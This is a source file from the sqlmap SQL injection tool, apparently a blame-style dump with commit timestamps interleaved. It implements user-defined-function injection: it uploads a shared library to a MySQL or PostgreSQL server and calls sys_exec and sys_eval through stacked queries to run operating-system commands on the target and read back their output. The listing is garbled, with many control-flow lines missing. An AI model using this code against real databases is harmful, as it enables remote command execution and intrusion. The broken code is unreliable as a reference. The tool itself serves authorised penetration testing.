2009-04-22 15:48:07 +04:00
#!/usr/bin/env python
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
2009-09-26 03:03:45 +04:00
import os
from lib.core.agent import agent
from lib.core.common import readInput
2009-04-22 15:48:07 +04:00
from lib.core.convert import urlencode
2009-09-26 03:03:45 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.dump import dumper
from lib.core.exception import sqlmapFilePathException
from lib.core.exception import sqlmapMissingMandatoryOptionException
2009-04-22 15:48:07 +04:00
from lib.core.exception import sqlmapUnsupportedFeatureException
from lib.request import inject
2009-09-26 03:03:45 +04:00
from lib.techniques.outband.stacked import stackedTest
2009-04-22 15:48:07 +04:00
class UDF:
This class defines methods to deal with User-Defined Functions for
def __init__(self):
self.createdUdf = set()
2009-09-26 03:03:45 +04:00
self.udfs = {}
2009-04-22 15:48:07 +04:00
self.udfToCreate = set()
2009-09-26 03:03:45 +04:00
def __askOverwriteUdf(self, udf):
2010-01-02 05:02:12 +03:00
message = "UDF '%s' already exists, do you " % udf
message += "want to overwrite it? [y/N] "
2009-09-26 03:03:45 +04:00
output = readInput(message, default="N")
if output and output[0] in ("y", "Y"):
return True
return False
def __checkExistUdf(self, udf):
2010-01-02 05:02:12 +03:00
logger.info("checking if UDF '%s' already exist" % udf)
2009-09-26 03:03:45 +04:00
query = agent.forgeCaseStatement(queries[kb.dbms].checkUdf % (udf, udf))
2010-01-17 00:46:35 +03:00
exists = inject.getValue(query, resumeValue=False, unpack=False, charsetType=2)
2009-09-26 03:03:45 +04:00
if exists == "1":
return True
return False
def udfCheckAndOverwrite(self, udf):
exists = self.__checkExistUdf(udf)
overwrite = True
2010-01-02 05:02:12 +03:00
if exists:
2009-09-26 03:03:45 +04:00
overwrite = self.__askOverwriteUdf(udf)
2010-01-02 05:02:12 +03:00
if overwrite:
2009-09-26 03:03:45 +04:00
def udfCreateSupportTbl(self, dataType):
debugMsg = "creating a support table to write commands standard "
debugMsg += "output to"
2010-01-02 05:02:12 +03:00
2009-09-26 03:03:45 +04:00
self.createSupportTbl(self.cmdTblName, self.tblField, dataType)
def udfExecCmd(self, cmd, silent=False, udfName=None):
2009-04-22 15:48:07 +04:00
cmd = urlencode(cmd, convall=True)
2009-09-26 03:03:45 +04:00
if udfName is None:
cmd = "'%s'" % cmd
udfName = "sys_exec"
2010-01-02 05:02:12 +03:00
inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)
2009-04-22 15:48:07 +04:00
2009-09-26 03:03:45 +04:00
def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):
2009-04-22 15:48:07 +04:00
cmd = urlencode(cmd, convall=True)
2009-09-26 03:03:45 +04:00
if udfName is None:
cmd = "'%s'" % cmd
udfName = "sys_eval"
2010-01-02 05:02:12 +03:00
inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd))
output = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last)
inject.goStacked("DELETE FROM %s" % self.cmdTblName)
2009-04-22 15:48:07 +04:00
if isinstance(output, (list, tuple)):
output = output[0]
if isinstance(output, (list, tuple)):
output = output[0]
return output
2009-09-26 03:03:45 +04:00
def udfCreateFromSharedLib(self):
errMsg = "udfSetRemotePath() method must be defined within the plugin"
2010-01-02 05:02:12 +03:00
raise sqlmapUnsupportedFeatureException(errMsg)
2009-09-26 03:03:45 +04:00
def udfSetRemotePath(self):
errMsg = "udfSetRemotePath() method must be defined within the plugin"
2010-01-02 05:02:12 +03:00
raise sqlmapUnsupportedFeatureException(errMsg)
2009-09-26 03:03:45 +04:00
def udfInjectCmd(self):
errMsg = "udfInjectCmd() method must be defined within the plugin"
2010-01-02 05:02:12 +03:00
raise sqlmapUnsupportedFeatureException(errMsg)
2009-09-26 03:03:45 +04:00
def udfInjectCore(self, udfDict):
for udf in udfDict.keys():
if udf in self.createdUdf:
if len(self.udfToCreate) > 0:
self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", False)
for udf, inpRet in udfDict.items():
if udf in self.udfToCreate and udf not in self.createdUdf:
self.udfCreateFromSharedLib(udf, inpRet)
if kb.dbms == "MySQL":
supportTblType = "longtext"
elif kb.dbms == "PostgreSQL":
supportTblType = "text"
def udfInjectCustom(self):
if kb.dbms not in ( "MySQL", "PostgreSQL" ):
errMsg = "UDF injection feature is not yet implemented on %s" % kb.dbms
2010-01-02 05:02:12 +03:00
raise sqlmapUnsupportedFeatureException(errMsg)
2009-09-26 03:03:45 +04:00
2010-01-02 05:02:12 +03:00
if not kb.stackedTest:
2009-09-26 03:03:45 +04:00
if self.isDba() == False:
warnMsg = "the functionality requested might not work because "
warnMsg += "the session user is not a database administrator"
if not conf.shLib:
msg = "which is the local path of the shared library? "
while True:
self.udfLocalFile = readInput(msg)
if self.udfLocalFile:
logger.warn("you need to specify the local path of the shared library")
self.udfLocalFile = conf.shLib
if not os.path.exists(self.udfLocalFile):
errMsg = "the specified shared library file does not exist"
2010-01-02 05:02:12 +03:00
raise sqlmapFilePathException(errMsg)
2009-09-26 03:03:45 +04:00
if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"):
errMsg = "shared library file must end with '.dll' or '.so'"
2010-01-02 05:02:12 +03:00
raise sqlmapMissingMandatoryOptionException(errMsg)
2009-09-26 03:03:45 +04:00
elif self.udfLocalFile.endswith(".so") and kb.os == "Windows":
errMsg = "you provided a shared object as shared library, but "
errMsg += "the database underlying operating system is Windows"
2010-01-02 05:02:12 +03:00
raise sqlmapMissingMandatoryOptionException(errMsg)
2009-09-26 03:03:45 +04:00
elif self.udfLocalFile.endswith(".dll") and kb.os == "Linux":
errMsg = "you provided a dynamic-link library as shared library, "
errMsg += "but the database underlying operating system is Linux"
2010-01-02 05:02:12 +03:00
raise sqlmapMissingMandatoryOptionException(errMsg)
2009-09-26 03:03:45 +04:00
self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0]
self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1]
msg = "how many user-defined functions do you want to create "
msg += "from the shared library? "
while True:
udfCount = readInput(msg, default=1)
if isinstance(udfCount, str) and udfCount.isdigit():
udfCount = int(udfCount)
if udfCount <= 0:
logger.info("nothing to inject then")
elif isinstance(udfCount, int):
logger.warn("invalid value, only digits are allowed")
for x in range(0, udfCount):
while True:
msg = "what is the name of the UDF number %d? " % (x + 1)
udfName = readInput(msg)
if udfName:
self.udfs[udfName] = {}
logger.warn("you need to specify the name of the UDF")
if kb.dbms == "MySQL":
defaultType = "string"
elif kb.dbms == "PostgreSQL":
defaultType = "text"
self.udfs[udfName]["input"] = []
default = 1
msg = "how many input parameters takes UDF "
msg += "'%s'? (default: %d) " % (udfName, default)
while True:
parCount = readInput(msg, default=default)
if isinstance(parCount, str) and parCount.isdigit() and int(parCount) >= 0:
parCount = int(parCount)
elif isinstance(parCount, int):
logger.warn("invalid value, only digits >= 0 are allowed")
for y in range(0, parCount):
msg = "what is the data-type of input parameter "
msg += "number %d? (default: %s) " % ((y + 1), defaultType)
while True:
parType = readInput(msg, default=defaultType)
if isinstance(parType, str) and parType.isdigit():
logger.warn("you need to specify the data-type of the parameter")
msg = "what is the data-type of the return "
msg += "value? (default: %s) " % defaultType
while True:
retType = readInput(msg, default=defaultType)
if isinstance(retType, str) and retType.isdigit():
logger.warn("you need to specify the data-type of the return value")
self.udfs[udfName]["return"] = retType
msg = "do you want to call your injected user-defined "
msg += "functions now? [Y/n/q] "
choice = readInput(msg, default="Y")
if choice[0] not in ( "y", "Y" ):
while True:
udfList = []
msg = "which UDF do you want to call?"
for udf, inpRet in self.udfs.items():
msg += "\n[%d] %s" % (len(udfList), udf)
msg += "\n[q] Quit"
while True:
choice = readInput(msg)
if choice[0] in ( "q", "Q" ):
if isinstance(choice, str) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList):
choice = int(choice)
elif isinstance(choice, int) and choice > 0 and choice <= len(udfList):
warnMsg = "invalid value, only digits >= 1 and "
warnMsg += "<= %d are allowed" % len(udfList)
cmd = ""
count = 1
udfToCall = udfList[choice - 1]
for inp in self.udfs[udfToCall]["input"]:
msg = "what is the value of the parameter number "
msg += "%d (data-type: %s)? " % (count, inp)
while True:
parValue = readInput(msg)
if parValue:
if "int" not in inp and "bool" not in inp:
parValue = "'%s'" % parValue
cmd += "%s," % parValue
logger.warn("you need to specify the value of the parameter")
count += 1
cmd = cmd[:-1]
msg = "do you want to retrieve the return value of the "
msg += "UDF? [Y/n] "
choice = readInput(msg, default="Y")
if choice[0] in ("y", "Y"):
output = self.udfEvalCmd(cmd, udfName=udfToCall)
if output:
dumper.string("return value", output)
print "No return value"
self.udfExecCmd(cmd, udfName=udfToCall, silent=True)
msg = "do you want to call this or another injected UDF? [Y/n] "
choice = readInput(msg, default="Y")
if choice[0] not in ("y", "Y"):